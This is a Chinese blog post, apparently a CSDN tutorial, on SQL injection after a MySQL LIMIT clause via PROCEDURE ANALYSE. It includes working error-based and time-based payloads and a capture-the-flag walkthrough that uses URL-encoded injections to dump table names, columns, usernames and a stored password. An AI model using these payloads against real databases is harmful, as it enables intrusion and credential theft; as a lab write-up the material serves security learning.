mysql 5.6 limit_Mysql下Limit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)

最新推荐文章于 2024-07-03 16:39:26 发布
最新推荐文章于 2024-07-03 16:39:26 发布
阅读量197 收藏 1
点赞数 1
文章标签: mysql 5.6 limit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39926042/article/details/113443177
版权

SQL语句类似下面这样:(此方法仅适用于5.0.0

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT (注入点)

问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order by 关键字,就可以使用 union 关键字,但是现在的情况是,注入点前面有 order by 关键字。

我们先看看 mysql 5.x 的文档中的 select 的语法:

48304ba5e6f9fe08f3fa1abda7d326ab.png

1 SELECT

2 [ALL | DISTINCT | DISTINCTROW ]

3 [HIGH_PRIORITY]

4 [STRAIGHT_JOIN]

5 [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

6 [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]

7 select_expr [, select_expr ...]

8 [FROM table_references

9 [WHERE where_condition]

10 [GROUP BY {col_name | expr | position}

11 [ASC | DESC], ... [WITH ROLLUP]]

12 [HAVING where_condition]

13 [ORDER BY {col_name | expr | position}

14 [ASC | DESC], ...]

15 [LIMIT {[offset,] row_count | row_count OFFSET offset}]

16 [PROCEDURE procedure_name(argument_list)]

17 [INTO OUTFILE 'file_name' export_options

18 | INTO DUMPFILE 'file_name'

19 | INTO var_name [, var_name]]

20 [FOR UPDATE | LOCK IN SHARE MODE]]

48304ba5e6f9fe08f3fa1abda7d326ab.png

在LIMIT后面可以跟两个函数,PROCEDURE 和 INTO,INTO除非有写入shell的权限,否则是无法利用的,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE。

尝试用这个存储过程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支持两个参数,试试两个参数:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

在 ANALYSE 中插入 sql 语句,sleep 没有被执行,可以使用报错注入:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果不支持报错注入的话,还可以基于时间注入,直接使用sleep不行,需要用BENCHMARK代替:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

1.使用 PROCEDURE ANALYSE:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1

Can't use ORDER clause with this procedure

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

2.使用报错注入爆表:

48304ba5e6f9fe08f3fa1abda7d326ab.png

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23

XPATH syntax error: ':article,user'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

48304ba5e6f9fe08f3fa1abda7d326ab.png

得到表名:article,user

3.爆列:

48304ba5e6f9fe08f3fa1abda7d326ab.png

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,title,contents,isread'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

48304ba5e6f9fe08f3fa1abda7d326ab.png

得到article表的列名:id,title,contents,isread

48304ba5e6f9fe08f3fa1abda7d326ab.png

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,username,password,lastloginI'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

48304ba5e6f9fe08f3fa1abda7d326ab.png

同样得到user表的列名:id,username,password,lastloginI

4.爆字段:

48304ba5e6f9fe08f3fa1abda7d326ab.png

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1

XPATH syntax error: ':user,admin,flag'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

48304ba5e6f9fe08f3fa1abda7d326ab.png

通过查询user表的username列,发现其中有一个字段是flag,那么直接读取flag字段的内容就可以了:

48304ba5e6f9fe08f3fa1abda7d326ab.png

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1

XPATH syntax error: ':myflagishere'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

48304ba5e6f9fe08f3fa1abda7d326ab.png

得到flag:myflagishere

weixin_39926042
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL 5.0.0第一个测试版本问世.pdf
10-10
综上所述,MySQL 5.0.0的第一个测试版本MySQL发展史上的一个重要节点,它不提升了数据库的特性和功能,还扩大了其在企业级应用中的适用范围。随着开源技术的普及,如Linux操作系统和Open Source技术的推崇,...
【转载】Mysql注入点在limit关键字后面的利用方法
weixin_30393907的博客
07-18 177
描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。 细节 在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样: SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT注入点】 问...
SQL特殊位置注入:order注入limit注入
fly_enum的博客
09-25 1150
平常在做测试的过程中,我们经常遇到的sql注入点一般是在where语句后面,但是偶尔也会遇到注入点在order by和limit。这两个位置由于其有一些特殊性,导致一些注入方式不能使用。下面就一起来看看这两个位置如何去注入
mysql5.6 limit用法_MySQL5.6limit的工作机制和order by limit优化原理
weixin_39795325的博客
02-03 346
MySQL5.6Limit的工作机制如果你需要在一个结果集中返回特定的几行,通常是使用limit,而不是取回整个结果集再舍去不需要的数据,MySQL通常按照如下的方式优化一个包含limit row_count或HAVING的语句:◎只有limit如果你只通过limit返回少量的行,那么正常情况下mysql会使用全盘扫描,有些场合会使用索引,以下是使用了覆盖索引的情况: 以下是使用全表扫描的情况...
mysql+limit+sql注入_Sql注入limit注入的学习
weixin_33110431的博客
01-19 144
0x01 前言今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入0x02 知识介绍limitLIMIT[位置偏移量,]行数其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。效果如图 自行理解bench...
【SQL中limit的用法】
热门推荐
qq_43899283的博客
04-07 3万+
SQL中limit的用法 说明:limit子句用于限制查询结果返回的数量,常用于分页查询。 用法:【select * from tableName limit i,n 】 参数:tableName: 为数据表; i: 为查询结果的索引值(默认从0开始); n: 为查询结果返回的数量 案例:(来自于力扣的一道简单题) 表: Orders +-----------------+----------+ | Column Name | Type | +-------------
mysql-connector-java-5.0.0-beta-bin
05-20
MySQL Connector/J 5.0.0-Beta 是MySQL数据库与Java应用程序之间的重要桥梁,它是一个实现了JDBC(Java Database Connectivity)规范的驱动程序,允许Java开发者在Java环境中连接和操作MySQL数据库。这篇详解将深入...
linux下安装java-mysql-redis-tomcat.docx
08-06
在Linux CentOS 7.6操作系统环境下,安装Java、MySQL、Redis和Tomcat是构建服务器环境的基础步骤。以下是如何在这类环境中逐步安装这些组件的详细指南。 **一、JDK的安装** 1. 首先,确保已下载JDK的tar.gz安装包...
找回失落的MySQL密码.pdf
10-10
本文主要介绍了在Red Hat 9.0系统环境下,如何找回MySQL密码的详细步骤,适用MySQL的开发版本5.0.0以及服务器和客户端的相关rpm包。 首先,找回MySQL密码的前提是你必须以root用户身份登录系统,因为只有root权限...
Sql注入limit注入的学习
bylfsj的博客
03-19 2631
0x01 前言 今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入 0x02 知识介绍 limit LIMIT[位置偏移量,]行数 其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。 效果如...
SQL注入之order by注入limit注入
m0_46467017的博客
08-09 4598
MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
SQL注入基础---order by \ limit \ 宽字节注入
qq_52016943的博客
08-09 1009
order by 、limit 、宽字节注入
mysql limit 条件_MySQLLIMIT 条件后注入
weixin_30801745的博客
01-25 252
标签:from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/此方法适用MySQL 5.x中,在limit语句后面的注入例如:SELECT[ALL|DISTINCT|DISTINCTROW][HIGH_PRIORITY][STRAIGHT_JOIN][SQL_SMALL_RESULT][SQL_BIG_RES...
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 1977
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
SQL注入各种注入原理|绕过技巧|带实例详解|
没有
03-19 7882
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击、SQL注入绕过技术、sql注入修复建议
sql括号转义_SQL手动注入:sqlilabs(less3140)
weixin_39811842的博客
12-09 355
点击蓝字关注我们吧!在你没有取得成功之前,一切的才华宛若狗屎。匠心前言突然想到都没简要介绍一下该靶机的关卡布局,上图吧。less31和 Less 29 相似,就是参数使用双引号+括号引用了,注入的时候注意闭合即可less 32源码分析check_addslashes()转义的字符有:反斜杠单引号双引号设置gbk编码方式(关键)参数被过滤之后单引号引用有数据回显漏洞利用由于...
Limit SQL注入
SheXinK’s Blog
12-18 797
Limit SQL注入1、 SQL注入介绍2、 Limit注入PHP代码3、 Limit注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 Limit注入PHP代码   新建PHP文件,将下面代码复制到P...
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_29712031的博客
01-21 414
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT?*?FROM?table?LIMIT?[offset,]?rows?...
【漏洞挖掘】——127、 Limit注入刨析
最新发布
Fly_鹏程万里
07-03 194
方法适用MySQL 5.x中,在limit语句后面的注入,常见的后台SQL语句如下所示:上面语句包含了ORDER BY,MySQL中UNION语句不能在ORDER BY的后面,不然这里利用UNION就可以很容易的读取数据了,下面看看在MySQL 5中的SELECT语法:从上面可以看到在LIMIT后面可以跟一个函数——PROCEDURE,那么使用PROCEDURE函数能否注入呢?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值